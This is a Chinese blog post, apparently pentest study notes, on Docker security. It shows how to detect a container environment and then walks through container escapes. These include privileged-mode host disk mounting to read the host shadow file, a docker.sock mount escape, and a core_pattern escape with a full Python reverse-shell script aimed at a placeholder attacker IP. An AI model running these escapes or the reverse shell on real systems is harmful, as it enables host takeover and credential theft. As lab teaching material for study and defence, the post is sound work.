云上攻防-云原生篇&Docker安全&权限环境检测&容器逃逸&特权模式&危险挂载

最新推荐文章于 2024-02-07 12:58:32 发布
最新推荐文章于 2024-02-07 12:58:32 发布
阅读量2.6k 收藏 2
点赞数
分类专栏: Cyber-Security 文章标签: 云原生 docker 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_53009585/article/details/133804272
版权

文章目录

前言

1、Docker是干嘛的?

Docker 是一个开放源代码软件,是一个开放平台,用于开发应用、交付(shipping)应用、运行应用。Docker允许用户将基础设施(Infrastructure)中的应用单独分割出来,形成更小的颗粒(容器),从而提高交付软件的速度。
Docker 容器与虚拟机类似,但二者在原理上不同,容器是将操作系统层虚拟化,虚拟机则是虚拟化硬件,因此容器更具有便携性、高效地利用服务器。

2、Docker对于渗透测试影响?

3、Docker渗透测试点有那些?

在这里插入图片描述

4、前渗透-判断在Docker中

没有权限:端口扫描详细信息,根据应用对象表现
但是想通过端口扫描判断对方是不是docker服务几乎是不可能的(我没遇到……)

拿到权限:

方式一:查询cgroup信息

docker中:
在这里插入图片描述真实主机上:
在这里插入图片描述

方式二:检查/.dockerenv文件

通过判断根目录下的 .dockerenv文件是否存在,可以简单的识别docker环境
docker中:
在这里插入图片描述真实主机上:
在这里插入图片描述
不过有一点需要注意的是,如果你获取的shell权限过小的话(www-data、或是某一服务的用户),根目录下也是不存在.dockerenv文件的
在这里插入图片描述

方式三:检查mount信息

利用mount查看挂载磁盘是否存在docker相关信息。

docker中:
在这里插入图片描述真实主机上:
在这里插入图片描述

方式四:查看硬盘信息

fdisk -l 容器输出为空,非容器有内容输出。

docker中:
在这里插入图片描述真实主机上:
在这里插入图片描述

方式五:查看文件系统以及挂载点

df -h 检查文件系统挂载的目录,也能够简单判断是否为docker环境。

df -h | egrep '(overlay|aufs)'

docker中:
在这里插入图片描述
真实主机上:
在这里插入图片描述

参考:https://blog.csdn.net/qq_23936389/article/details/131467165

5、前渗透-镜像中的应用漏洞

正常web渗透测试

6、前渗透-镜像中的默认配置

7、后渗透-三种安全容器逃逸

-特权模式启动导致(不安全启动 适用于java jsp高权限无需提权 还要提权才能逃逸)
-危险挂载启动导致(危险启动 适用于java jsp高权限无需提权 还要提权才能逃逸)
-docker自身&系统漏洞(软件漏洞和系统漏洞 都可用)
https://wiki.teamssix.com/CloudNative/
在这里插入图片描述

容器逃逸-特权模式

启动靶场:docker run --rm --privileged=true -it alpine
在这里插入图片描述检测环境:cat /proc/1/cgroup | grep -qi docker && echo “Is Docker” || echo “Not Docker”
在这里插入图片描述判断特权:cat /proc/self/status | grep CapEff
如果是以特权模式启动的话,CapEff 对应的掩码值应该为0000003fffffffff 或者是 0000001fffffffff
在这里插入图片描述
查看目录:fdisk -l
在这里插入图片描述特权逃逸:mkdir /test && mount /dev/vda1 /test
在这里插入图片描述判断结果:尝试访问宿主机 shadow 文件,可以看到正常访问
在这里插入图片描述

容器逃逸-危险挂载

1、挂载Docker Socket逃逸

启动靶场:docker run -itd --name with_docker_sock -v /var/run/docker.sock:/var/run/docker.sock ubuntu
进入环境:docker exec -it with_docker_sock /bin/bash
检测环境:ls -lah /var/run/docker.sock
在这里插入图片描述挂载逃逸:
apt-get update
apt-get install curl
curl -fsSL https://get.docker.com/ | sh
在容器内部创建一个新的容器,并将宿主机目录挂载到新的容器内部
docker run -it -v /:/host ubuntu /bin/bash
在这里插入图片描述chroot /host
在这里插入图片描述

2、挂载宿主机procfs逃逸

启动环境:docker run -it -v /proc/sys/kernel/core_pattern:/host/proc/sys/kernel/core_pattern ubuntu
检测环境:find / -name core_pattern
在这里插入图片描述找到当前容器在宿主机下的绝对路径

cat /proc/mounts | xargs -d ',' -n 1 | grep workdir

在这里插入图片描述这就表示当前绝对路径为

/var/lib/docker/overlay2/5c86feb33aba7c5fc559bee1a7b47b1f8004e1f6f20db4b97d8efbfa4cc33a19/merged

创建一个反弹 Shell 的 py 脚本

cat >/tmp/.x.py << EOF
#!/usr/bin/python
import os
import pty
import socket
lhost = "xx.xx.xx.xx"
lport = xxxx
def main():
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect((lhost, lport))
    os.dup2(s.fileno(), 0)
    os.dup2(s.fileno(), 1)
    os.dup2(s.fileno(), 2)
    os.putenv("HISTFILE", '/dev/null')
    pty.spawn("/bin/bash")
    os.remove('/tmp/.x.py')
    s.close()
if __name__ == "__main__":
    main()
EOF

给 Shell 赋予执行权限

chmod 777 .x.py

写入反弹 shell 到目标的 proc 目录下

echo -e "|/var/lib/docker/overlay2/ad9b33531057ae1736388c0198e80e49de165b12d9d16bd81fd44022cff0e72f/merged/tmp/.x.py \rcore    " >  /host/proc/sys/kernel/core_pattern

在攻击主机上开启一个监听,然后在容器里运行一个可以崩溃的程序

cat >/tmp/x.c << EOF
#include <stdio.h>
int main(void)
{
    int *a = NULL;
    *a = 1;
    return 0;
}
EOF

gcc x.c -o t
./t

在这里插入图片描述不过我这里尝试了好几次都没有成功……

模拟真实场景:
1、高权限-Web入口到Docker逃逸(Java)

docker run --rm --privileged=true -it -p 8888:8080 vulfocus/shiro-721

在这里插入图片描述在这里插入图片描述在这里插入图片描述2、低权限-Web入口到Docker逃逸(PHP)

docker run --rm --privileged=true -it -p 8080:80 sagikazarmark/dvwa

java大部分都是高权限,php需提权……

今天是 几号
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
离线部署docker&docker-compose
02-08
离线部署docker&docker-compose
云原生培训-Docker&podman原厂培训PPT
03-16
云原生培训-Docker&podman原厂培训PPT: Docker是什么 Docker基本概念 Docker常用命令实战 DockerFile指令 Docker核心技术 Docker案例实战
Docker安全与相关渗透的研究
最新发布
qq_45087791的博客
02-07 1129
云上攻防 云原生 Docker安全 系统内核 版本漏洞 CDK自动利用 容器逃逸
基于Ubuntu——docker&docker-compose&nvidia-docker2&nvidia驱动离线安装
01-18
1.包含docker安装的包及依赖包 2.包含docker-compose安装的包及依赖包 3.基于Ubuntu系统的nvidia驱动包 4.nvidia-docker2驱动安装包及依赖包 5.安装命令简介 下载之后,可以在无网的环境下离线安装。
docker-build-push:Docker Build&Push GitHub操作
05-08
Docker构建和推送操作 构建一个Docker映像并将其推送到您选择的私有注册表中。 支持的Docker注册表 Docker集线器 Google Container Registry(GCR) AWS Elastic Container Registry(ECR) GitHub Docker注册表 重大变化 如果遇到问题,请确保使用的是(当前为v5)。 在v4和v5之间不推荐使用AWS ECR登录命令。 此外,在v4和v5之间添加了对多个标签的支持。 基本用法 使用此操作之前,请确保您运行操作 将以下内容添加到.yml的/.github目录中的工作流程.yml文件中 steps : - uses : actions/checkout@v2 name : Check out code - uses : mr-smithers-excellent/docker-buil
docker&&nvidia-docker安装包
07-08
部署docker&&nvidia-docker的离线包; docker部署的步骤: 上传到服务器上,解压安装包,解压完成进入nvidia-docker目录,在进入里面的docker目录,cd nvidia-docker/docker/ 直接执行里面的install.sh脚本即可; nvidia-docker部署步骤: 和上面描述的一样,先操作上面的步骤,然后nvidia-docker会多加一步操作,切换到nvidia-docker目录就好;cd nvidia-docker 也可以看到一个install.sh脚本,不过这个脚本是装nvidia-docker的,而docker目录有一个install.sh是装docker的; docker&&nvidia-docker安装\部署完成之后就启动docker并设置开机自启: systemctl daemon-reload systemctl start docker systemctl enable docker 完成之后可以“docker images && docker ps -a”来查看,也可以load镜像或者pull镜像来测试。
生命在于学习——docker逃逸
易水哲的博客
12-02 4375
docker逃逸就是从当前docker容器权限逃逸出来,获得宿主机的权限
DockerDocker逃逸小结
woodwhale的博客
03-28 1764
docker逃逸小结
安全攻防(七)之 容器逃逸
把自己活成一道光,因为你不知道,谁会借着你的光,走出了黑暗。请保持心中的善良,因为你不知道,谁会借着你的善良,走出了绝望。请保持你心中的信仰,因为你不知道,谁会借着你的信仰,走出了迷茫。请相信自己的力量,因为你不知道,谁会因为相信你,开始相信了自己....
08-08 1488
以其他虚拟化技术类似,逃逸是最为严重的安全风险,直接危害了底层宿主机和整个云计算系统的安全,“容器逃逸”是指攻击者通过劫持容器业务化逻辑或直接控制(CaaS等合法获得容器控制权的场景)等方式,已经获得了容器内某种权限下的命令执行能力,攻击者利用这种执行能力,借助一些手段进而获得该容器所在的直接宿主机某种权限下的命令执行能力。到此为止,攻击者已经基本从容器内部逃逸出来了,这里说基本,是因为仅仅挂载了宿主机的根目录,如果用ps命令查看的话,可以看到还是容器内部的进程,因为没有挂载宿主机的 procfs。
关于Docker逃逸
Aiwin的博客
03-22 2065
Docker逃逸复现
(四)Docker进阶网络模式特权指令
csdn570566705的博客
03-16 2619
假设我们需要创建两个容器 container1 和 container2,它们需要在同一个自定义网络 mynetwork 中,并且 container1 需要能够与 container2 通信,而 container2 不需要与 container1 通信。现在,我们需要让 container1 能够与 container2 通信,而 container2 不需要与 container1 通信。注意,这里的 应该替换为 container2 的 IP 地址。
基于RedHat——docker&docker-compose&nvidia-docker2&nvidia驱动离线安装
01-18
1.包含docker安装的包及依赖包 2.包含docker-compose安装的包及依赖包 3.基于RedHat系统的nvidia驱动包 4.nvidia-docker2驱动安装包及依赖包 5.安装命令简介 下载之后,可以在无网的环境下离线安装。
云原生-docker操作文档
11-06
云原生-docker操作文档
【linux】docker-compose1.25.5 & docker-machine0.16.2
05-22
Docker-Compose项目是Docker官方的开源项目,负责实现对Docker容器集群的快速编排。 Docker-Machine 是 Docker 官方提供的一个工具,它可以帮助我们在远程的机器上安装 Docker
docker&docker-compose.zip
04-01
docker以及docker-compose离线安装文件
docker-php-nginx:基于 phusionbaseimage-dockerDockerized php & nginx-源码
06-17
docker-php-nginx 基于 phusion/baseimage-dockerDockerized php & nginx
云原生-DockerDocker Compose微服务部署示例
04-12
java运维 ,微服务平台使用Docker compose部署案例,并附文件代码及注意事项。
log-sys, 基于 spring 云 & Docker的分布式日志系统.zip
10-09
log-sys, 基于 spring 云 & Docker的分布式日志系统 日志追踪模型基于论文:短小精悍英文原文论文译文IntellJ思想jdk1.7maven3.3.9nodejs6.9.2spr
云原生Docker和K8S 02-Docker进阶
08-08
云原生Docker和K8S 02-Docker进阶
docker&docker-compose实战 笔记
05-16
Docker是一个开源的容器化技术,可用于轻松创建、部署和运行应用程序。它允许开发人员在容器中构建和打包应用程序及其依赖项,并在任何地方进行部署。容器化技术使得应用程序在任何环境中都可以快速可靠地运行,无需再考虑环境配置问题。 Docker提供了一个集中式的管理和部署平台,可以轻松跨多个服务器和数据中心管理应用程序。 Docker容器中的应用程序依赖于基础架构,因此它们在没有更改其他应用程序的情况下可以轻松迁移到其他平台。 Docker的优势包括速度和可移植性。 Docker容器启动快速,几乎无需任何准备工作,因此可以快速提供应用程序服务。 Docker容器还可以在本地和基于云的环境中轻松移植,从而实现对多种不同基础设施的支持。 Docker是开发和运维团队的理想选择,它可以缩短部署周期和减少环境相关问题的数量。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值